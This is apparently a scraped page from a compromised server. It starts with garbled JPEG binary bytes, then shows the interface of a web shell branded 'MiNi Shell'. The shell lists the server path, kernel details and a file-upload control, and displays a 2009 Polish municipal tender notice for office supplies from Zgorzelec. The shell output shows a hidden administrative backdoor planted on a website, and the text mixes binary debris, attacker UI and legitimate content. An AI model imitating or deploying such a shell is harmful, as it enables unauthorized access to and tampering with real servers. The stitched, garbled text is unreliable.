JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/59799-N-2009.html

<p class="kh_header"><b>Zgorzelec: Dostawa materiałów biurowych na potrzeby Urzedu Miasta Zgorzelec</b><br>
<b>Numer ogłoszenia: 59799 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych na potrzeby Urzedu Miasta Zgorzelec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiotem zamówienia  jest  dostawa materiałów biurowych do siedziby Urzędu
      Miasta w Zgorzelcu przy ul. Domańskiego 7,  wraz z rozładunkiem  przez 
      Wykonawcę. 
2.   Wykonawca dostarczy materiały biurowe do siedziby Zamawiającego w dwóch 
      dostawach: 
      1) pierwsza dostawa do dnia 30.04.2009r. 
      2) druga dostawa do dnia 30.10.2009r. 
2.1  Dostawa materiałów biurowych realizowana będzie w dni robocze w godzinach od 
      8.00 do 14.00. 
2.2  Materiały biurowe powinny być dostarczone w opakowaniach zbiorczych 
      zabezpieczonych przed uszkodzeniem. Opakowanie powinno zawierać dokładny 
      opis  jego zawartości. 
2.3  Wykonawca dostarczy materiały biurowe do siedziby Zamawiającego zgodnie ze 
       złożoną ofertą. Rodzaj, ilość dostawy przedmiotu umowy, będą określane przez 
       Zamawiającego w zależności od potrzeb, zgodnie z przesłanym pisemnym  
       zamówieniem, i realizowane w terminie do 7 dni  roboczych od daty otrzymania  
       zamówienia.
2.4  Wykonawca powiadomi Zamawiającego telefonicznie lub pisemnie o terminie 
      dostawy nie później niż 3 dni przed terminem dostawy.  
3.   Zakres rzeczowo-ilościowy zamówienia określa załącznik nr 5 do Specyfikacji 
      Istotnych Warunków Zamówienia, będący jednocześnie formularzem cenowym.
4.   Ilości określone w formularzu cenowym ustalone zostały jako maksymalne. 
      Zamawiający zastrzega sobie możliwość zwiększenia bądź zmniejszenia ilości 
      materiałów biurowych, wymienionych w formularzu cenowym, przy czym  
      wynagrodzenie ryczałtowe brutto dostawy nie może być niższe  lub wyższe  niż 
      wartość określona przez Wykonawcę w formularzu ofertowym. 
      Z tego tytułu nie będą przysługiwały Wykonawcy żadne roszczenia. 
5.   Formularz cenowy - załącznik nr 5 do SIWZ, zawiera minimalne wymagania 
      parametrów technicznych poszczególnych materiałów biurowych, które  muszą 
      być spełnione przez Wykonawcę. Wykonawca może zaoferować materiały biurowe 
      o lepszych właściwościach, parametrach i cechach określonych przez 
      Zamawiającego.
6.   Zaproponowane przez Wykonawcę materiały o mniejszych parametrach 
      technicznych, pominięcie pozycji z formularza cenowego, zmiana opisów 
      przedmiotu dostawy, ilości lub dodanie innej pozycji spowoduje odrzucenie oferty. 
7.    Zamawiający wymaga, aby oferowany przedmiot zamówienia był:
       - wysokiej jakości, 
       - fabrycznie nowy, 
       - nie noszący śladów uszkodzeń zewnętrznych oraz uprzedniego używania, 
       - pochodzący z bieżącej produkcji, 
       - oryginalnie zapakowany i zaopatrzony w etykiety identyfikujące dany produkt.        
8.   Odbiór przedmiotu zamówienia odbędzie się w obecności Zamawiającego i 
      Wykonawcy, potwierdzony protokołem odbioru dostawy  po sprawdzeniu jego 
      ilości  i jakości. 
9.   Zamawiający wymaga by termin przydatności użycia materiałów biurowych 
      wymienionych w formularzu cenowym, dostarczonych w danej partii do siedziby 
      Zamawiającego wynosił 12 miesięcy od daty ich otrzymania, zaś w przypadku 
      sprzętu biurowego 24 miesiące. 
    
Zamówienie powyżej 14.000 euro a poniżej kwot określonych w art. 11 ust. 8 Pzp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.92.30-1, 30.19.76.20-8, 30.19.00.00-7, 30.10.00.00-0, 30.23.31.31-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona  wadium w wysokości  1 700,00 zł. PLN (słownie: 
    jeden tysiąc siedemset zł.)
2. Wadium musi obejmować okres związania ofertą.
    Uwaga! Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i 
               zobowiązania  Zamawiającego i Wykonawcy  dot. w/w ustaleń będą 
               podlegały -  odpowiednio nowym terminom.
3. Termin wniesienia wadium upływa wraz z terminem składania ofert, o godzinie 
    wyznaczonej na składanie ofert.
4. Wykonawca, który nie wniesie wadium w wymaganym terminie, w tym również na 
    przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu 
    związania ofertą  zostanie przez Zamawiającego wykluczony z ubiegania się o 
    udzielenie zamówienia   publicznego. 
5. W zależności od woli wykonawcy wadium może być wnoszone w formach:
    - pieniądzu,
    - poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
      kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
    - gwarancjach bankowych,
    - gwarancjach ubezpieczeniowych,
    - poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 
      2 ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
      Przedsiębiorczości   (Dz.U. z 2007r. Nr 42, poz. 275)
UWAGA!  Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 
             ustawy Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej 
             jeżeli Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 
             ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa 
             w art. 25 ust. 1, lub pełnomocnictw.  
6. Warunkiem uznania wniesienia wadium będzie załączony do oferty dokument
    potwierdzający wniesienie wadium do Zamawiającego.
7. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    zamawiającego Nr 35124012971111000025654013 w banku PEKAO S.A. I
    O/Zgorzelec.
     Na przelewie należy  umieścić informację :
     Dostawa materiałów biurowych na potrzeby Urzędu Miasta Zgorzelec 
8. Zamawiający zwraca wadium jeżeli:
    - upłynął termin związania ofertą 
    - zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie
       należytego wykonania tej umowy 
    - zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty 
       zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
 9.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
    a/ który wycofał ofertę przed upływem terminu składania ofert,
    b/ który został wykluczony z postępowania,
    c/ którego oferta została odrzucona.
10.Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym 
     zwrócono wadium na podstawie art.46 ust.2 pkt. 2 i 3 ustawy Pzp, jeżeli w wyniku 
     ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia  
     wykonawcy lub odrzucenia oferty. Wykonawcy wniosą wadium w terminie 
     określonym przez   Zamawiającego
11.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
     wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
     pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
     za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
      odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
      dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, 
      chyba że udowodni, ze wynika to z przyczyn należących po jego stronie. 
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
      oferta  została wybrana :
      a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
          określonych w ofercie, 
      b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
      c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
          przyczyn   leżących  po stronie wykonawcy.
14. Wadium wybranego wykonawcy zostanie zwrócone niezwłocznie po wniesieniu
      wymaganego zabezpieczenia należytego wykonania umowy i zawarciu przez niego
      umowy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  Warunki udziału w postępowaniu
1.1 O udzielenie Zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki 
udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp,  i nie podlegają   
wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz złożą dokumenty potwierdzające 
spełnienie  tych warunków.
W szczególności zamawiający wymaga, aby wykonawcy wykazali, że:
1/  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
     ustawy nakładają obowiązek posiadania takich uprawnień,
2/  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
     technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią 
     pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
     technicznego i osób   zdolnych do wykonania zamówienia
3/  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
     zamówienia,  
4/ nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
1.2 Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu:
        
Zamawiający dokona oceny spełnienia każdego z  warunków na podstawie 
załączonych do oferty dokumentów, o których mowa w pkt. 2  metodą 
spełnia / nie  spełnia.
Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznane
przez zamawiającego jako niespełnienie warunku, co będzie skutkować           
wykluczeniem  wykonawcy z postępowania, z zastrzeżeniem art.  26 ust. 3 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy 
    w celu potwierdzenia spełnienia warunków udziału w postępowaniu;        
    zgodny z  wymogami art. 22 ust. 1 ustawy Prawo zamówień publicznych i  treścią  
    Rozporządzenia  Prezesa Rady  Ministrów z dnia 19 maja 2006 r.   w sprawie 
    rodzajów dokumentów,  jakich może  żądać  zamawiający od wykonawcy  oraz 
    form,  w jakich te dokumenty mogą być  składane  (Dz. U. z 2006r. Nr 87, poz. 605  
    oraz Dz. U. z  2008r. Nr 171, poz. 1058).

2.1W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1 
     podpunkt 1, Zamawiający żąda załączenia :    
     1/aktualnego  odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie 
        do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
        do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego 
        nie wcześniej niż 6  miesięcy przed upływem terminu składania wniosków o 
        dopuszczenie  do udziału w   postępowaniu o udzielenie zamówienia albo 
        składania  ofert (§ 1 ust.1,  pkt 2  rozporządzenia Prezesa Rady Ministrów z dnia
        24 maja 2006 r.  Dz.U. Nr 87,  poz. 605) .
        Za aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
        do ewidencji działalności gospodarczej uznaje się zarówno dokument 
        wystawiony odpowiednio nie wcześniej  niż sześć m-cy przed upływem terminu 
        składania ofert,  jak również dokument, wystawiony  w okresie wcześniejszym, 
        jeżeli istnienie określonych w  nim okoliczności potwierdzone   zostanie przez 
        właściwy organ w wymaganym terminie i  opatrzone urzędową adnotacją  
        potwierdzającą  jego aktualność.   
 Uwaga! W przypadku składania oferty przez Wykonawców występujących 
            wspólnie,    w/w  dokument składa każdy z przedsiębiorców  tworzących
            konsorcjum.  
2/ zaświadczenia z Krajowego Rejestru Karnego
    a/  w zakresie określonym w art. 24 ust. 1 pkt  4-8   ustawy Pzp, wystawione nie 
         wcześniej niż  6  miesięcy przed  terminem składania  ofert, 
    b/ zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 
        ust.1 pkt 9  ustawy Pzp, wystawione nie wcześniej niż  6 miesięcy przed 
        terminem składania ofert (§ 1  ust 1. pkt 4 i 5 rozporządzenia Prezesa Rady 
        Ministrów z dnia 24 maja 2006 r. Dz.U. Nr  87,  poz.   605) 
Uwaga! W przypadku składania oferty przez Wykonawców występujących wspólnie, 
           w/w  dokument składa każdy z przedsiębiorców  tworzących konsorcjum.

Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium 
Rzeczypospolitej   Polskiej, zamiast dokumentów, o których mowa w pkt. 2.1  
podpunkty   1 i 2b składa dokument lub dokumenty wystawione w kraju, w którym ma  
siedzibę  lub  miejsce  zamieszkania, potwierdzające  odpowiednio że:
-nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej   niż  6  miesięcy przed upływem terminu składania ofert, 
-nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie  wcześniej niż 6  miesięcy przed upływem terminu składania ofert. 
W zakresie dokumentu określonego w pkt. 2.1 podpunkt 2a Wykonawca składa   
zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub
miejsce zamieszkania, nie wydaje się wyżej wymienionych dokumentów, zastępuje się
je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym 
organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca   ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy  przed 
upływem terminu składania ofert.

2.2 W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1
      podpunkt 2,  Zamawiający żąda:
1) wykazu  wykonanych   a w przypadku świadczeń okresowych lub ciągłych również   
    wykonywanych, dostaw  w okresie ostatnich trzech lat przed dniem wszczęcia 
    postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest 
    krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostaw 
    stanowiącym przedmiot  zamówienia,  z podaniem ich wartości oraz  daty i miejsca 
    wykonania oraz załączeniem  dokumentów   potwierdzających,  że roboty te 
    zostały  wykonane   należycie   -  wg załącznika  nr 4   do SIWZ
    Zamawiający wymaga, aby  wykaz zawierał: 
    - dwie dostawy materiałów biurowych o wartości nie mniejszej  niż  30 000,00 zł 
      brutto każda. 

2.3W celu potwierdzenia, warunku udziału w postępowaniu określonego  w pkt. 
     1.1 Zamawiający żąda:      
     1) oświadczenia Wykonawcy, o spełnieniu warunków udziału w postępowaniu 
         zgodnie z art. 22 ust. 1 i nie podleganiu wykluczeniu z art. 24 ust. 1 i 2 ustawy
         Pzp. złożone na formularzu stanowiącym załącznik nr 3  do SIWZ . Wykonawcy, 
         którzy wspólnie ubiegają się o udzielenie zamówienia wypełniają załącznik nr 3A.
 3.Wymagania dotyczące oferty
    Do oferty Wykonawca musi złożyć następujące dokumenty:   
    1.  wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru), 
    2.  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
         (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
         konsorcjum), 
    3. oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
         zamówień   publicznych - załącznik nr 2 do SIWZ, 
    4. wypełniony i podpisany formularz cenowy - załącznik nr 5 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec
ul. Domańskiego 6 pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
Punkt Obsługi Interesanta
59-900 Zgorzelec
ul. Domańskiego 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com